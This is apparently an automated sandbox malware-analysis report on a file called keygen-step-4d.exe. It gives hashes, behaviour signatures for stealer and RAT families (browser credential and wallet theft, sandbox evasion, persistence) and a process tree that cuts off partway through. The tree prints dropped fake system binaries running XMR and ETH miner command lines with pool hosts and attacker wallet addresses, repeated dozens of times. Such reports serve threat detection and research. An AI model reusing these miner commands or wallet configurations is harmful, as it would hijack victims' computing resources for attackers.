Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    602s
  • max time network
    560s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 05:23

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 53 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:996
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
      1⤵
        PID:1884
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2780
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2844
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2760
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2464
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2436
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1392
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                  • Modifies registry class
                  PID:1156
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1104
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:680
                    • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                      C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:6380
                      • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                        "{path}"
                        3⤵
                        • Suspicious behavior: GetForegroundWindowSpam
                        PID:1500
                        • C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe
                          "C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe" -o pool.minexmr.com:4444 -u 49sjJJDaUPKiSdVsdUR1R51v1ovWXrAZw3QYEDay7qVt3gqxju2anikWRWkZ8ymFfzUyCvw27WP8WV7QvdYVSSrJH26nsXa -p x --max-cpu-usage 40
                          4⤵
                            PID:2472
                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                            4⤵
                              PID:904
                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                              4⤵
                                PID:5244
                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                4⤵
                                  PID:5216
                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                  4⤵
                                    PID:5204
                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                    4⤵
                                      PID:7104
                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                      4⤵
                                        PID:5592
                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                        4⤵
                                          PID:6300
                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                          4⤵
                                            PID:3532
                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                            4⤵
                                              PID:6448
                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                              4⤵
                                                PID:7128
                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                4⤵
                                                  PID:6080
                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                  4⤵
                                                    PID:5272
                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                    4⤵
                                                      PID:5884
                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                      4⤵
                                                        PID:8
                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                        4⤵
                                                          PID:1140
                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                          4⤵
                                                            PID:5368
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                            4⤵
                                                              PID:5172
                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                              4⤵
                                                                PID:6224
                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                4⤵
                                                                  PID:1960
                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                  4⤵
                                                                    PID:4076
                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                    4⤵
                                                                      PID:6740
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                      4⤵
                                                                        PID:5456
                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                        4⤵
                                                                          PID:1816
                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                          4⤵
                                                                            PID:2136
                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                            4⤵
                                                                              PID:5720
                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                              4⤵
                                                                                PID:1532
                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                4⤵
                                                                                  PID:2548
                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                  4⤵
                                                                                    PID:6512
                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                    4⤵
                                                                                      PID:4108
                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                      4⤵
                                                                                        PID:5764
                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                        4⤵
                                                                                          PID:5576
                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                          4⤵
                                                                                            PID:1312
                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                            4⤵
                                                                                              PID:3540
                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                              4⤵
                                                                                                PID:4740
                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                4⤵
                                                                                                  PID:6716
                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                  4⤵
                                                                                                    PID:2452
                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                    4⤵
                                                                                                      PID:6460
                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                      4⤵
                                                                                                        PID:7048
                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                        4⤵
                                                                                                          PID:6300
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                          4⤵
                                                                                                            PID:5688
                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                            4⤵
                                                                                                              PID:5460
                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                              4⤵
                                                                                                                PID:5548
                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                4⤵
                                                                                                                  PID:4772
                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                  4⤵
                                                                                                                    PID:6896
                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                    4⤵
                                                                                                                      PID:416
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                      4⤵
                                                                                                                        PID:6640
                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                        4⤵
                                                                                                                          PID:7136
                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                          4⤵
                                                                                                                            PID:4972
                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                            4⤵
                                                                                                                              PID:5668
                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
